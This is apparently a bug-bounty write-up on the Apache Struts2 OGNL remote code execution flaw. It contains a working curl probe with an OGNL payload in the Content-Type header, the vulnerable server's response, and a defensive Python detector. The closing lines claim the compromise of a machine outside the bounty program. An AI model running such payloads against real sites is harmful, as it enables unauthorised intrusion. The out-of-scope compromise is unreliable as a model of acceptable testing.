Bug Name: RCE | Bug Priority: Critical | Bounty: $2500
org.apache.struts:struts2-core is a popular open-source framework for developing web applications in the Java programming language. Affected versions of this package are vulnerable to Remote Code Execution (RCE): forced double OGNL evaluation, when performed on raw user input in tag attributes, may lead to remote code execution. Affected package: org.apache.struts:struts2-core, versions [2.0.0, 2.5.22).
1) Spider or crawl the application.
2) Check whether the application is built with Java.
3) Check for the file extensions .do, .action, .go and .jsp.
4) Insert OGNL payloads in the Content-Type header and in GET or POST parameters of the endpoints.
5) If the injected response header comes back, the endpoint is vulnerable.
Set the target in Burp, then go to the Spider tab, add the OGNL payload and start the spider. If any endpoint is vulnerable, the injected response header shows up automatically. After the spider finishes, open the Search tab, select "in scope" and "show response header", and search for the response header.
https://github.com/karthi-the-hacker/PayloadAllTheThings
curl -i -s -k -X $'GET' \
  -H $'Host: target.com' \
  -H $'User-Agent: Chrome/89.0.4389.114 Safari/537.36' \
  -H $'Connection: close' \
  -H $'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*' \
  -H $'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
  -H $'Content-Type: %{#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'Hacker\', \'karthithehacker\')}.multipart/form-data' \
  -H $'Accept-Encoding: gzip, deflate' \
  $'https://target.com/'
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: XXXXX
Hacker: karthithehacker
Set-Cookie: JSESSIONID=XXXXX
Content-Type: text/html
Transfer-Encoding: chunked
Date: XXXXXX
Connection: close
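From the defender's side, the two checks that follow from this writeup are (a) whether the deployed struts2-core version falls inside the affected range [2.0.0, 2.5.22) and (b) whether an incoming request carries an OGNL expression marker in a header, as the Content-Type above does. This is an added example, not code from the original writeup; the sample requests, the host example.invalid and the %{EXPRESSION} placeholder are constructed.

```python
import re
from typing import Iterable, List, Tuple

# Affected org.apache.struts:struts2-core range stated above: [2.0.0, 2.5.22)
AFFECTED_MIN = (2, 0, 0)
FIXED_VERSION = (2, 5, 22)

# OGNL expression openers; "%{" is what the Content-Type payload above uses.
OGNL_MARKER = re.compile(r"[%$]\{")


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '2.5.20' into (2, 5, 20); missing components count as 0."""
    parts = [int(p) for p in re.findall(r"\d+", v)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected_version(v: str) -> bool:
    """True if struts2-core version v lies inside [2.0.0, 2.5.22)."""
    return AFFECTED_MIN <= parse_version(v) < FIXED_VERSION


def find_ognl_headers(raw_request: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs of request headers whose value opens an
    OGNL expression.  Input is a raw HTTP request as a proxy or WAF logs it."""
    hits = []
    for line in raw_request.splitlines()[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        if OGNL_MARKER.search(value):
            hits.append((name.strip(), value.strip()))
    return hits


# Constructed samples: one benign request and one carrying the same kind of
# Content-Type as the page's example, with the expression body replaced by a
# placeholder (only the opener matters for detection).
SAMPLE_REQUESTS = [
    "GET /login.do HTTP/1.1\r\nHost: example.invalid\r\n"
    "Content-Type: multipart/form-data",
    "GET /login.do HTTP/1.1\r\nHost: example.invalid\r\n"
    "Content-Type: %{EXPRESSION}.multipart/form-data",
]


def triage(requests: Iterable[str]) -> List[int]:
    """Indexes of the requests that should raise an alert."""
    return [i for i, r in enumerate(requests) if find_ognl_headers(r)]


if __name__ == "__main__":
    print(triage(SAMPLE_REQUESTS))                  # [1]
    print(is_affected_version("2.5.20"), is_affected_version("2.5.22"))
```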
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
Always look for .do, .action and .jsp files.
In this POC video I have shown how I successfully exploited RCE. I'm not disclosing any of the private program information here. In this video I have compromised a machine which is not in the private program.